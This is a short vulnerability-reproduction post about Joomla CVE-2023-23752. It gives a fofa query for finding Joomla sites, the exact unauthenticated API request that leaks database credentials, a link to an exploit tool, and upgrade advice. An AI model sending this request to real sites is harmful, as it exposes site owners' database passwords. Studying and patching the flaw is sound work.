Article directory
Joomla has an unauthorized access vulnerability CVE-2023-23752
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to Joomla Unauthorized Access Vulnerability
WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account
Joomla is an open source, cross-platform content management system (CMS) developed by the Open Source Matters team in the United States using PHP and MySQL.
2. Vulnerability description
Joomla is an open source, cross-platform content management system (CMS) developed using PHP and MySQL. ApiRouter.php#parseApiRoute in Joomla 4.0.0 to 4.2.7 does not effectively filter the request parameters when processing the user's Get request, so that the attacker can send a request containing public=true parameters to the Joomla service endpoint (such as: / api/index.php/v1/config/application?public=true&key=value) for unauthorized access
CVE number: CVE-2023-23752
CNNVD number: CNNVD-202302-1375
CNVD number:
3. Affect the version
Joomla 4.0.0 to 4.2.7 has a security vulnerability
4. fofa query statement
app=“Joomla”
5. Vulnerability recurrence
Vulnerability link: http://xxxx.com/api/index.php/v1/config/application?public=true
Vulnerability data package:
GET http://xxxx.com/api/index.php/v1/config/application?public=true HTTP/1.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Leaking database usernames, passwords, hosts, etc.
Exploitation tool: https://github.com/Pari-Malam/CVE-2023-23752
6.POC&EXP
Exp tool address: https://github.com/Pari-Malam/CVE-2023-23752
If you can’t open GitHub, you can follow the official account Nanfeng Vulnerability Recurrence Library and reply Vulnerability Reproduce 33 to get the POC tool download address.
7. Rectification opinions
At present, the vulnerability has been fixed, and affected users can upgrade to Joomla! CMS version 4.2.8 in time.